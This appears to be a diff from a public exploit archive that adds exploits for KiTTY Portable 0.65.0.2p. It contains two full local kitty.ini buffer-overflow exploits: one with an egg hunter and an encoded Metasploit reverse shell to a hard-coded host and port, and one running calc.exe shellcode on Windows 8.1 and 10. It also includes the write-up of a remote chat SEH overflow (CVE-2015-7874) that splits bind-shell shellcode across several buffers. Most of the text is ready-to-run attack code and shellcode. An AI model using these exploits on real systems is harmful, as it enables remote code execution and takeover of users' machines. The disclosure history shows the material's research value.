Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
like a deadend, is in fact exploitable:
ECX and EBX points to our buffer
EDX and EDI are overwritten by our buffer
EDI = 41414141
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
at offset 1048. We can write a valid memory address into EDI, allowing the program to continue
its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
Let's take a closer look to the code executed:
764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here
764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX]
764F8DBF 03D0 ADD EDX,EAX
764F8DC1 83F0 FF XOR EAX,FFFFFFFF
764F8DC4 33C2 XOR EAX,EDX
764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX]
764F8DC8 83C1 04 ADD ECX,4
764F8DCB A9 00010181 TEST EAX,81010100
764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE
764F8DD4 83C7 04 ADD EDI,4
764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above
1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction
following this code:
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE
764F8DD4 83C7 04 ADD EDI,4
764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8
764F8DD9 84D2 TEST DL,DL
764F8DDB 74 32 JE SHORT msvcrt.764F8E0F
764F8DDD 84F6 TEST DH,DH
764F8DDF 74 15 JE SHORT msvcrt.764F8DF6
764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000
764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF
764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX
764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0
764F8DF4 5F POP EDI
764F8DF5 C3 RETN <------- We want that !
This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
give us the control of the execution flow.
When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no
crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there
for EDI
3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
to make ESP pointing to it when the crash happens.
After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time
of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make
EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4.
As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
To sume it up:
1) First crash with EIP overwritten seems not exploitable
2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
4) The RET instruction is reached and execution crashes again
5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
who do all the work for us inside, and goes out back to us with the vault key (EIP).
Finally, as the memory area we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required.
"""
egg = "w00t" # \x77\x30\x30\x74
# Wow64 Egghunter - Corelan Team
# Written by Lincoln (lincoln@corelan.be)
# Size: 46 bytes
egghunter = (
"\x31\xdb" # XOR EBX, EBX
"\x53" # PUSH EBX
"\x53" # PUSH EBX
"\x53" # PUSH EBX
"\x53" # PUSH EBX
"\xb3\xc0" # MOV BL,0xc0
"\x66\x81\xCA\xFF\x0F" # OR DX,0FFF
"\x42" # INC EDX
"\x52" # PUSH EDX
"\x6A\x26" # PUSH 26
"\x58" # POP EAX
"\x33\xC9" # XOR ECX,ECX
"\x8B\xD4" # MOV EDX,ESP
"\x64\xff\x13" # CALL DWORD PTR FS:[ebx]
"\x5e" # POP ESI
"\x5a" # POP EDX
"\x3C\x05" # CMP AL,5
"\x74\xe9" # JE SHORT egg.0043F000
"\xB8\x77\x30\x30\x74" # MOV EAX,74303077 w00t
"\x8B\xFA" # MOV EDI,EDX
"\xAF" # SCAS DWORD PTR ES:[EDI]
"\x75\xe4" # JNZ SHORT egg.0043F001
"\xAF" # SCAS DWORD PTR ES:[EDI]
"\x75\xe1" # JNZ SHORT 0043F001
"\xFF\xE7" # JMP EDI
)
# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
# Encoder: x86/alpha_mixed
# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
# Size: 710 bytes
shellcode = (
"\x89\xe3\xda\xd4\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x48\x68\x4c\x42\x45\x50\x57\x70\x67\x70\x33\x50\x4e"
"\x69\x49\x75\x35\x61\x39\x50\x53\x54\x6c\x4b\x32\x70\x76\x50"
"\x6c\x4b\x56\x32\x46\x6c\x4c\x4b\x73\x62\x46\x74\x4c\x4b\x72"
"\x52\x54\x68\x64\x4f\x6f\x47\x33\x7a\x57\x56\x44\x71\x49\x6f"
"\x6c\x6c\x55\x6c\x63\x51\x33\x4c\x77\x72\x56\x4c\x61\x30\x6a"
"\x61\x4a\x6f\x76\x6d\x66\x61\x6f\x37\x6b\x52\x6a\x52\x56\x32"
"\x73\x67\x4c\x4b\x62\x72\x46\x70\x6c\x4b\x33\x7a\x67\x4c\x4c"
"\x4b\x30\x4c\x76\x71\x64\x38\x49\x73\x53\x78\x77\x71\x4b\x61"
"\x53\x61\x4c\x4b\x30\x59\x51\x30\x35\x51\x4a\x73\x4c\x4b\x47"
"\x39\x67\x68\x68\x63\x36\x5a\x33\x79\x6e\x6b\x44\x74\x6c\x4b"
"\x36\x61\x6b\x66\x44\x71\x49\x6f\x4e\x4c\x49\x51\x38\x4f\x56"
"\x6d\x66\x61\x6f\x37\x56\x58\x4b\x50\x51\x65\x59\x66\x54\x43"
"\x43\x4d\x68\x78\x45\x6b\x63\x4d\x75\x74\x33\x45\x4a\x44\x30"
"\x58\x6c\x4b\x71\x48\x35\x74\x47\x71\x5a\x73\x65\x36\x6c\x4b"
"\x76\x6c\x42\x6b\x6e\x6b\x30\x58\x55\x4c\x36\x61\x79\x43\x6c"
"\x4b\x55\x54\x6e\x6b\x37\x71\x7a\x70\x6b\x39\x70\x44\x71\x34"
"\x65\x74\x43\x6b\x53\x6b\x73\x51\x73\x69\x42\x7a\x73\x61\x4b"
"\x4f\x4d\x30\x73\x6f\x53\x6f\x32\x7a\x4c\x4b\x62\x32\x68\x6b"
"\x6e\x6d\x63\x6d\x30\x68\x50\x33\x44\x72\x63\x30\x53\x30\x33"
"\x58\x50\x77\x43\x43\x45\x62\x71\x4f\x30\x54\x43\x58\x72\x6c"
"\x54\x37\x34\x66\x73\x37\x6b\x4f\x6e\x35\x4e\x58\x7a\x30\x76"
"\x61\x37\x70\x65\x50\x64\x69\x6a\x64\x32\x74\x72\x70\x50\x68"
"\x34\x69\x4d\x50\x62\x4b\x45\x50\x79\x6f\x68\x55\x46\x30\x56"
"\x30\x66\x30\x62\x70\x73\x70\x72\x70\x63\x70\x72\x70\x42\x48"
"\x38\x6a\x74\x4f\x6b\x6f\x6b\x50\x79\x6f\x69\x45\x6f\x67\x63"
"\x5a\x65\x55\x50\x68\x79\x50\x6c\x68\x6d\x57\x4d\x53\x32\x48"
"\x36\x62\x57\x70\x67\x61\x43\x6c\x6b\x39\x4b\x56\x71\x7a\x76"
"\x70\x73\x66\x51\x47\x43\x58\x6f\x69\x59\x35\x54\x34\x43\x51"
"\x79\x6f\x49\x45\x4e\x65\x4f\x30\x63\x44\x44\x4c\x79\x6f\x50"
"\x4e\x56\x68\x53\x45\x7a\x4c\x73\x58\x6c\x30\x4e\x55\x4c\x62"
"\x46\x36\x69\x6f\x38\x55\x55\x38\x53\x53\x42\x4d\x70\x64\x55"
"\x50\x4e\x69\x68\x63\x33\x67\x72\x77\x76\x37\x36\x51\x4a\x56"
"\x61\x7a\x54\x52\x46\x39\x53\x66\x4b\x52\x69\x6d\x71\x76\x49"
"\x57\x30\x44\x46\x44\x77\x4c\x57\x71\x47\x71\x4e\x6d\x47\x34"
"\x37\x54\x62\x30\x58\x46\x77\x70\x53\x74\x43\x64\x52\x70\x42"
"\x76\x43\x66\x33\x66\x51\x56\x53\x66\x72\x6e\x66\x36\x46\x36"
"\x52\x73\x72\x76\x30\x68\x52\x59\x48\x4c\x47\x4f\x4b\x36\x6b"
"\x4f\x59\x45\x6f\x79\x4b\x50\x52\x6e\x51\x46\x57\x36\x39\x6f"
"\x66\x50\x75\x38\x55\x58\x4d\x57\x45\x4d\x51\x70\x69\x6f\x4e"
"\x35\x6f\x4b\x78\x70\x6c\x75\x6d\x72\x42\x76\x32\x48\x4d\x76"
"\x7a\x35\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x57\x4c\x65\x56\x71"
"\x6c\x74\x4a\x6d\x50\x69\x6b\x4b\x50\x70\x75\x55\x55\x4f\x4b"
"\x72\x67\x34\x53\x73\x42\x72\x4f\x73\x5a\x63\x30\x52\x73\x4b"
"\x4f\x39\x45\x41\x41"
)
# Stack address where to copy our shellcode, with an offset of ESP - 1052
edi = '\xE4\xC0\x28' # 0x0028C0E4 WIN7 Pro x64
nops = '\x90' * 8
eggmark = egg * 2
padding = '\x41' * (1048 - len(nops) - len(egghunter))
# The memory area we land makes bigger shellcode crashes after being decoded
# Using a 46 bytes egg hunter and putting our shellcode somewhere else solves this problem
payload1 = nops + egghunter + padding + edi # Egg Hunter
payload2 = eggmark + nops + shellcode # Final Shellcode
# Kitty.ini configuration file
buffer ="[ConfigBox]\n"
buffer +="height=22\n"
buffer +="filter=yes\n"
buffer +="#default=yes\n"
buffer +="#noexit=no\n"
buffer +="[KiTTY]\n"
buffer +="backgroundimage=no\n"
buffer +="capslock=no\n"
buffer +="conf=yes\n"
buffer +="cygterm=yes\n"
buffer +="icon=no\n"
buffer +="#iconfile=\n"
buffer +="#numberoficons=45\n"
buffer +="paste=no\n"
buffer +="print=yes\n"
buffer +="scriptfilefilter=\n"
buffer +="size=no\n"
buffer +="shortcuts=yes\n"
buffer +="mouseshortcuts=yes\n"
buffer +="hyperlink=no\n"
buffer +="transparency=no\n"
buffer +="#configdir=\n"
buffer +="#downloaddir=\n"
buffer +="#uploaddir=\n"
buffer +="remotedir=\n"
buffer +="#PSCPPath=\n"
buffer +="#PlinkPath=\n"
buffer +="#WinSCPPath=\n"
buffer +="#CtHelperPath=\n"
buffer +="#antiidle== \k08\\\n"
buffer +="#antiidledelay=60\n"
buffer +="sshversion=" + payload2 + "\n" # Shellcode
buffer +="#WinSCPProtocol=sftp\n"
buffer +="#autostoresshkey=no\n"
buffer +="#UserPassSSHNoSave=no\n"
buffer +="KiClassName=" + payload1 + "\n" # Egg Hunter
buffer +="#ReconnectDelay=5\n"
buffer +="savemode=dir\n"
buffer +="bcdelay=0\n"
buffer +="commanddelay=5\n"
buffer +="initdelay=2.0\n"
buffer +="internaldelay=10\n"
buffer +="slidedelay=0\n"
buffer +="wintitle=yes\n"
buffer +="zmodem=yes\n"
buffer +="[Print]\n"
buffer +="height=100\n"
buffer +="maxline=60\n"
buffer +="maxchar=85\n"
buffer +="[Folder]\n"
buffer +="[Launcher]\n"
buffer +="reload=yes\n"
buffer +="[Shortcuts]\n"
buffer +="print={SHIFT}{F7}\n"
buffer +="printall={F7}\n"
# Location of our Kitty.ini file (modify with your KiTTY directory)
file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
try:
print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
f = open(file,'w')
f.write(buffer)
f.close()
print "[*] Done!"
except:
print "[-] Error writing %s" % file

263
platforms/windows/local/39122.py Executable file
View file

@ -0,0 +1,263 @@
# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
# Date: 28/12/2015
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: http://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.9bis.net/kitty/
# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
# Version: 0.65.0.2p
# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
# Category: Local
"""
Disclosure Timeline:
--------------------
2015-09-18: Vulnerability discovered
2015-09-26: Vendor contacted
2015-09-28: Vendor answer
2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
2015-11-15: KiTTY 0.66.6.1p released, seems fixed
2015-12-28: exploit published
Description :
-------------
A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into
the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is
overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use
kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute
local executables on Windows 8.1 and Windows 10.
Win8.1 -> Code Execution
Win10 -> Code Execution
Instructions:
-------------
- Run exploit
- Launch KiTTY
Exploitation:
-------------
As EDX register points to our buffer, it seems like using a return address pointing to a
JMP EDX instruction would do the trick. However this is not the case, because of the address containing
a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
overwritten:
EAX = 00000041
00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
00533DA4 00 DB 00
Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
like a deadend, is in fact exploitable:
ECX and EBX points to our buffer
EDX and EDI are overwritten by our buffer
EDI = 41414141
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
at offset 1048. We can write a valid memory address into EDI, allowing the program to continue
its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
Let's take a closer look to the code executed:
764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here
764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX]
764F8DBF 03D0 ADD EDX,EAX
764F8DC1 83F0 FF XOR EAX,FFFFFFFF
764F8DC4 33C2 XOR EAX,EDX
764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX]
764F8DC8 83C1 04 ADD ECX,4
764F8DCB A9 00010181 TEST EAX,81010100
764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE
764F8DD4 83C7 04 ADD EDI,4
764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above
1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction
following this code:
764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE
764F8DD4 83C7 04 ADD EDI,4
764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8
764F8DD9 84D2 TEST DL,DL
764F8DDB 74 32 JE SHORT msvcrt.764F8E0F
764F8DDD 84F6 TEST DH,DH
764F8DDF 74 15 JE SHORT msvcrt.764F8DF6
764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000
764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF
764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX
764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0
764F8DF4 5F POP EDI
764F8DF5 C3 RETN <------- We want that!
This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
give us the control of the execution flow.
When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no
crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there
for EDI
3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
to make ESP pointing to it when the crash happens.
After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time
of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make
EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4.
As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
To sume it up:
1) First crash with EIP overwritten seems not exploitable
2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
4) The RET instruction is reached and execution crashes again
5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
who do all the work for us inside, and goes out back to us with the vault key (EIP).
"""
import sys
if len(sys.argv) == 1:
print "\nUsage: kitty_ini_8_10.py <win8.1|win10>"
print "Example: kitty_ini_8_10.py win8.1"
sys.exit()
os = sys.argv[1] # Windows version to target
# Metasploit WinExec shellcode (calc.exe)
# Encoder: x86/alpha_mixed
# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
# Size: 448 bytes
shellcode = (
"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c"
"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50"
"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74"
"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f"
"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b"
"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62"
"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e"
"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51"
"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30"
"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b"
"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64"
"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43"
"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51"
"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b"
"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e"
"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74"
"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79"
"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b"
"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47"
"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f"
"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30"
"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35"
"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42"
"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a"
"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42"
"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41"
)
# Stack address where to copy our shellcode, with an offset of ESP - 1052
if os == "win8.1":
edi = '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64
elif os == "win10":
edi = '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64
else:
print "Unknown OS chosen. Please choose 'win8.1' or 'win10'."
sys.exit()
nops = '\x90' * 8
padding = '\x41' * (1048 - len(nops) - len(shellcode))
payload = nops + shellcode + padding + edi
# Kitty.ini configuration file
buffer ="[ConfigBox]\n"
buffer +="height=22\n"
buffer +="filter=yes\n"
buffer +="#default=yes\n"
buffer +="#noexit=no\n"
buffer +="[KiTTY]\n"
buffer +="backgroundimage=no\n"
buffer +="capslock=no\n"
buffer +="conf=yes\n"
buffer +="cygterm=yes\n"
buffer +="icon=no\n"
buffer +="#iconfile=\n"
buffer +="#numberoficons=45\n"
buffer +="paste=no\n"
buffer +="print=yes\n"
buffer +="scriptfilefilter=\n"
buffer +="size=no\n"
buffer +="shortcuts=yes\n"
buffer +="mouseshortcuts=yes\n"
buffer +="hyperlink=no\n"
buffer +="transparency=no\n"
buffer +="#configdir=\n"
buffer +="#downloaddir=\n"
buffer +="#uploaddir=\n"
buffer +="remotedir=\n"
buffer +="#PSCPPath=\n"
buffer +="#PlinkPath=\n"
buffer +="#WinSCPPath=\n"
buffer +="#CtHelperPath=\n"
buffer +="#antiidle== \k08\\\n"
buffer +="#antiidledelay=60\n"
buffer +="sshversion=\n"
buffer +="#WinSCPProtocol=sftp\n"
buffer +="#autostoresshkey=no\n"
buffer +="#UserPassSSHNoSave=no\n"
buffer +="KiClassName=" + payload + "\n"
buffer +="#ReconnectDelay=5\n"
buffer +="savemode=dir\n"
buffer +="bcdelay=0\n"
buffer +="commanddelay=5\n"
buffer +="initdelay=2.0\n"
buffer +="internaldelay=10\n"
buffer +="slidedelay=0\n"
buffer +="wintitle=yes\n"
buffer +="zmodem=yes\n"
buffer +="[Print]\n"
buffer +="height=100\n"
buffer +="maxline=60\n"
buffer +="maxchar=85\n"
buffer +="[Folder]\n"
buffer +="[Launcher]\n"
buffer +="reload=yes\n"
buffer +="[Shortcuts]\n"
buffer +="print={SHIFT}{F7}\n"
buffer +="printall={F7}\n"
# Kitty.ini file location (modify according to your installation path)
file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
try:
print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
f = open(file,'w')
f.write(buffer)
f.close()
print "[*] Done!"
except:
print "[-] Error writing %s" % file

341
platforms/windows/remote/39119.py Executable file
View file

@ -0,0 +1,341 @@
# Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
# Date: 28/12/2015
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: http://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.9bis.net/kitty/
# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
# Version: 0.65.0.2p
# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR)
# CVE: CVE-2015-7874
# Category: Remote
"""
Disclosure Timeline:
--------------------
2015-09-13: Vulnerability discovered
2015-09-26: Vendor contacted
2015-09-28: Vendor answer
2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
2015-12-28: exploit published
Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release,
while providing an external chat DLL as a separate download.
Description :
-------------
A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the
vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586).
Chat feature is not enabled by default.
WinXP -> Remote Code Execution
Win7 -> Remote Code Execution
Win10 -> Remote Code Execution
Instructions:
-------------
- Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini)
- Start KiTTY on 127.0.0.1 port 1987 (Telnet)
- Run exploit from remote machine (Kali Linux is fine)
Exploitation:
-------------
When sending a long string to the KiTTY chat server as nickname, a crash occurs. The EIP overwrite does let little room
for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit
small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection.
We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which
forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with.
The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3
successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy
its shellcode slice to a stable memory location which has enough room to place a bigger shellcode. The final buffer
jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding
and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one,
and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other
exploits and vulnerabilities as well.
All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET.
I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit.
Pro & Cons:
-----------
[+]: works from XP to Windows 10 as it uses addresses from the main executable
[+]: not affected by system DEP/ASLR/SafeSEH as the main executable is not protected
[+]: works even with small slice size below 50 bytes, instead of 118
[-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the
CPU's core number. However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully.
Also, for a bind shell payload, the connection is kept open even when closing the main program.
[-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another
vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash.
Graphical explanation:
---------------------
-------------------
-------------------
---- SHELLCODE ----
-------------------
-------------------
1) Shellcode Slicer -> slice[1]
-> slice[2]
-> slice[3]
2) Buffer Builder -> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh
-> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh
-> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh
TARGET CRASH AREA TARGET DST ADDR
----------------------- shell_copy --------------
3) Slice Launcher -> Sends buffer[1] ------------------------>| buffer[1] (thread1) | -----> | slice[1] | <-|
-> Sends buffer[2] ------------------------>| buffer[2] (thread2) | -----> | slice[2] | |
-> Sends buffer[3] ------------------------>| buffer[3] (thread3) | -----> | slice[3] | |
----------------------- -------------- |
| |
|____________________________________|
jump to rebuilt shellcode
guillaume@kali64:~$ ./kitty_chat.py 10.0.0.52 win10
KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
[*] Connecting to 10.0.0.52
[*] Sending evil buffer1... (slice 1/3)
[*] Sending evil buffer2... (slice 2/3)
[*] Sending evil buffer3... (slice 3/3)
